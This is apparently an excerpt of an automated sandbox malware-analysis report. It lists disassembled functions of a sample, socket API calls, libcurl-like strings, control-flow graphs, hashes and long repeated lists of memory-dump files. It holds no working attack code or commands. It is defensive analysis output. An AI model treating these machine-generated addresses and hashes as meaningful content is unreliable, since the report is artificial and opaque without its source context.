                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 347336affc9af2852e8425a14ad4ea48c3e6561c4a82136ee44298d6ad9df590
                                                              • Instruction ID: 97c702cb7240fbaddcb782fc4a08f07cf3e46ab91130b672888aae10e178a1f1
                                                              • Opcode Fuzzy Hash: 347336affc9af2852e8425a14ad4ea48c3e6561c4a82136ee44298d6ad9df590
                                                              • Instruction Fuzzy Hash: A9510370604346ABDB15DF24C895FAAB7A5FF85314F18852DFD488B382E730E952CBA1
                                                              Function 00D976A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1526 d976a0-d976be 1527 d976c0-d976c7 1526->1527 1528 d976e6-d976f2 send 1526->1528 1527->1528 1529 d976c9-d976d1 1527->1529 1530 d9775e-d97762 1528->1530 1531 d976f4-d97709 call d972a0 1528->1531 1532 d9770b-d97759 call d972a0 call d9cb20 call 1118c50 1529->1532 1533 d976d3-d976e4 1529->1533 1531->1530 1532->1530 1533->1531
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,00D93D4E,00000000,?,?,00DA07BF), ref: 00D976EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3388739168
                                                              • Opcode ID: ec795e7be9df8e9cd07eff8a358e75c92862b3a8fc14e7660cc1a5802e671b10
                                                              • Instruction ID: e8d74b6935aa711ca5ec1c708ddcea549e4c3f4a23c6078a619064c9ccc895f9
                                                              • Opcode Fuzzy Hash: ec795e7be9df8e9cd07eff8a358e75c92862b3a8fc14e7660cc1a5802e671b10
                                                              • Instruction Fuzzy Hash: 56113AF5A293447BDA319B559C85E277B9CDFC2B2CF440908F80817355D2619C0482B2
                                                              Function 0111D1D0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1545 111d1d0-111d281 call 1118d18 1548 111d3b7-111d3c1 1545->1548 1549 111d287-111d28e 1545->1549 1550 111d2da-111d2dd 1549->1550 1551 111d290-111d2a1 1550->1551 1552 111d2df-111d305 1550->1552 1553 111d2a3-111d2aa 1551->1553 1554 111d2ac-111d2b6 1551->1554 1555 111d3b0 1552->1555 1556 111d30b-111d324 1552->1556 1553->1554 1557 111d2bf-111d2c2 1553->1557 1558 111d340-111d347 call 1118c68 1554->1558 1559 111d2bc 1554->1559 1555->1548 1560 111d326-111d332 1556->1560 1561 111d2c9-111d2d4 1557->1561 1580 111d34c 1558->1580 1559->1557 1562 111d334-111d337 1560->1562 1563 111d358-111d35d 1560->1563 1561->1550 1561->1555 1562->1558 1562->1563 1567 111d570-111d576 1562->1567 1568 111d6d3-111d6dc 1562->1568 1569 111d4fc-111d4fe 1562->1569 1570 111d620-111d62a 1562->1570 1571 111d700-111d735 call 111b6a0 1562->1571 1572 111d602-111d604 1562->1572 1573 111d4e4-111d4f7 call 111b640 1562->1573 1574 111d4c6-111d4c8 1562->1574 1575 111d6a6-111d6af 1562->1575 1576 111d5e9-111d5ec 1562->1576 1577 111d4ab-111d4ad 1562->1577 1578 111d5cb-111d5cd 1562->1578 1579 111d5ad-111d5af 1562->1579 1565 111d363-111d366 1563->1565 1566 111daeb-111db00 call 111b640 1563->1566 1565->1566 1583 111d36c-111d36e 1565->1583 1566->1561 1581 111d5f2-111d5fd 1567->1581 1599 111d578-111d57e 1567->1599 1595 111d6e2-111d6fb call 111ca50 1568->1595 1596 111d9de-111d9ee call 111ca50 1568->1596 1589 111d3a0-111d3a4 1569->1589 1597 111d504-111d54f localeconv call 11278b0 1569->1597 1586 111d630-111d643 1570->1586 1587 111d8d2-111d8e7 1570->1587 1571->1561 1584 111dad1-111dad4 1572->1584 1585 111d60a-111d61b 1572->1585 1573->1561 1574->1589 1591 111d4ce-111d4df 1574->1591 1592 111d6b5-111d6ce call 111c9c0 1575->1592 1593 111da4c-111da65 call 111c9c0 1575->1593 1576->1581 1582 111dbbc-111dbdd 1576->1582 1577->1589 1590 111d4b3-111d4c1 1577->1590 1578->1589 1601 111d5d3-111d5e4 1578->1601 1579->1589 1600 111d5b5-111d5c6 1579->1600 1580->1557 1602 111d3a6-111d3a8 1581->1602 1582->1602 1604 111d374-111d37f 1583->1604 1605 111dadb-111dae6 1583->1605 1584->1566 1609 111dad6 1584->1609 1585->1602 1607 111d649-111d657 1586->1607 1608 111db9c-111db9e 1586->1608 1616 111dba0-111dba2 1587->1616 1617 111d8ed-111d8fd 1587->1617 1589->1602 1590->1602 1591->1602 1592->1561 1593->1561 1595->1561 1620 111d9f3-111d9f7 1596->1620 1640 111d551-111d556 1597->1640 1641 111d55e-111d56b 1597->1641 1618 111db05-111db18 1599->1618 1619 111d584-111d592 1599->1619 1600->1602 1601->1602 1602->1560 1625 111d3ae 1602->1625 1604->1589 1621 111d381-111d389 1604->1621 1623 111d663-111d670 1607->1623 1624 111d659-111d65c 1607->1624 1628 111dba4-111dbb7 call 111b9d0 1608->1628 1609->1605 1616->1628 1630 111d909-111d918 1617->1630 1631 111d8ff-111d902 1617->1631 1618->1602 1632 111dcd8-111dcda 1619->1632 1633 111d598-111d5a8 1619->1633 1620->1561 1636 111db8c-111db97 1621->1636 1637 111d38f-111d39c 1621->1637 1638 111d676-111d687 1623->1638 1639 111dcb9-111dcd3 call 111b9d0 1623->1639 1624->1623 1625->1555 1643 111dc9a-111dcb4 call 111b9d0 1630->1643 1644 111d91e-111d92f 1630->1644 1631->1630 1634 111dcf3-111dd13 1632->1634 1635 111dcdc-111dce7 1632->1635 1633->1602 1634->1602 1635->1634 1636->1602 1637->1589 1646 111db1d-111db26 1638->1646 1647 111d68d-111d6a1 call 111cc90 1638->1647 1639->1620 1640->1641 1641->1602 1643->1639 1650 111dc81-111dc8a 1644->1650 1651 111d935-111d93a 1644->1651 1656 111db5c-111db5f 1646->1656 1647->1620 1650->1643 1655 111d940-111d97a call 111cc90 1651->1655 1651->1656 1655->1620 1656->1650 1658 111db65 1656->1658 1658->1636
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$Inf$NaN
                                                              • API String ID: 0-141429178
                                                              • Opcode ID: 652923d4494de8afebfc7956c3951c2ea3cdc9348b91b034d58bd2a522ea8407
                                                              • Instruction ID: 1aaba57d94b90860293425339d4c16601db11356b64dca2bb82325b560a07254
                                                              • Opcode Fuzzy Hash: 652923d4494de8afebfc7956c3951c2ea3cdc9348b91b034d58bd2a522ea8407
                                                              • Instruction Fuzzy Hash: 2DF1DE7060C3858BDB299F68D0847ABFBE2BB85314F058A2DD9DD87389D7349905CB83
                                                              Function 00D97770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1761 d97770-d9778e 1762 d97790-d97797 1761->1762 1763 d977b6-d977c2 recv 1761->1763 1762->1763 1764 d97799-d977a1 1762->1764 1765 d9782e-d97832 1763->1765 1766 d977c4-d977d9 call d972a0 1763->1766 1768 d977db-d97829 call d972a0 call d9cb20 call 1118c50 1764->1768 1769 d977a3-d977b4 1764->1769 1766->1765 1768->1765 1769->1766
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: ba9c73cf9d2b3fde2f505c8db7f80293a5d4a1acb216147ea1d8e1efa3db59ed
                                                              • Instruction ID: 735958cbf9939aaa5c38cd52ac5ec7f81a6cd91be6d356e3556c202c6c787f04
                                                              • Opcode Fuzzy Hash: ba9c73cf9d2b3fde2f505c8db7f80293a5d4a1acb216147ea1d8e1efa3db59ed
                                                              • Instruction Fuzzy Hash: 07110AF5A293547BD630AB559C49E273B9CDBC6F6CF480A18F80C63396D6619C0482F2
                                                              Function 00D975E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1780 d975e0-d975ed 1781 d975ef-d975f6 1780->1781 1782 d97607-d97629 socket 1780->1782 1781->1782 1783 d975f8-d975ff 1781->1783 1784 d9762b-d9763c call d972a0 1782->1784 1785 d9763f-d97642 1782->1785 1786 d97601-d97602 1783->1786 1787 d97643-d97699 call d972a0 call d9cb20 call 1118c50 1783->1787 1784->1785 1786->1782
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 298a2adcf1a08d6a5628185623e76d781c48df59c2018cc2123fcefe6e9048c2
                                                              • Instruction ID: 52ebeffd080ce476bd607efb0d9f4d01098d3fb8471bce1946c60c9617165e56
                                                              • Opcode Fuzzy Hash: 298a2adcf1a08d6a5628185623e76d781c48df59c2018cc2123fcefe6e9048c2
                                                              • Instruction Fuzzy Hash: 6411C6B5A2425137DB215B2A6C56F9B3B98DB92738F480914F418962E6D2118C5493F2
                                                              Function 00DCA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2052 dca150-dca159 2053 dca15f-dca17b 2052->2053 2054 dca250 2052->2054 2055 dca249-dca24f 2053->2055 2056 dca181-dca1ce getsockname 2053->2056 2055->2054 2057 dca1f7-dca214 call dcef30 2056->2057 2058 dca1d0-dca1f5 call dad090 2056->2058 2057->2055 2063 dca216-dca23b call dad090 2057->2063 2065 dca240-dca246 call dd4f40 2058->2065 2063->2065 2065->2055
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00DCA1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00DCA23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 00DCA1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: aa105a616364bad39d30c45a622bfd876c70ff572f04c1b733e4f1704f62213b
                                                              • Instruction ID: 70299f7dbd9c00d736b7a610196617f4e730bf38f2a9f4fe297eb52c9c82ed78
                                                              • Opcode Fuzzy Hash: aa105a616364bad39d30c45a622bfd876c70ff572f04c1b733e4f1704f62213b
                                                              • Instruction Fuzzy Hash: 8B210A31808285BAF7259B58DC42FE7B3BCEF81328F040658F99853151FB32698687F6
                                                              Function 00DAD5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 00DAD65A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: 912b676c618f0e0a482a578617be7631886e40dc6f52d4b056254f953e71ba22
                                                              • Instruction ID: 60e18a5dc7bb8fd1354bd8651fd68ac06bf80539e3f5302bc41531d3fa7df5d9
                                                              • Opcode Fuzzy Hash: 912b676c618f0e0a482a578617be7631886e40dc6f52d4b056254f953e71ba22
                                                              • Instruction Fuzzy Hash: C8012BD0E4538456E721AF38A81736536946B53308F4C186CE88D921DAF769C54CC2B3
                                                              Function 00E5AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00E5AB9B
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E5ABE3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: b6ddf4153055ef8adafcd8db216bd4a2a19d5d4b3e1db3be78c37e212de4b678
                                                              • Instruction ID: 7bf8c36507af3212049a1476b13c0bc8f61373afd679bf70fddedaf904fae84f
                                                              • Opcode Fuzzy Hash: b6ddf4153055ef8adafcd8db216bd4a2a19d5d4b3e1db3be78c37e212de4b678
                                                              • Instruction Fuzzy Hash: CEE1C1706003019BEB20CF14C885B6A77E5FF85319F185E3DED98AB291D775D988CB92
                                                              Function 07270224 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416835471.0000000007270000.00000040.00001000.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7270000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: DrivesLogical
                                                              • String ID: A:\
                                                              • API String ID: 999431828-3379428675
                                                              • Opcode ID: 6b85edc51ebdc04fa7d47e098cea6f295b643ea94f6d5e4006a2fc8f83fe2275
                                                              • Instruction ID: d06af01a557ac1106d662d2f0df1bc02000c45f63bc304ccf496d7bcde4f1031
                                                              • Opcode Fuzzy Hash: 6b85edc51ebdc04fa7d47e098cea6f295b643ea94f6d5e4006a2fc8f83fe2275
                                                              • Instruction Fuzzy Hash: FF21E2EB17C124BF622281896B149FA7BAEF9C77307318077F802D2501E7F44A0D9176
                                                              Function 00D978B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
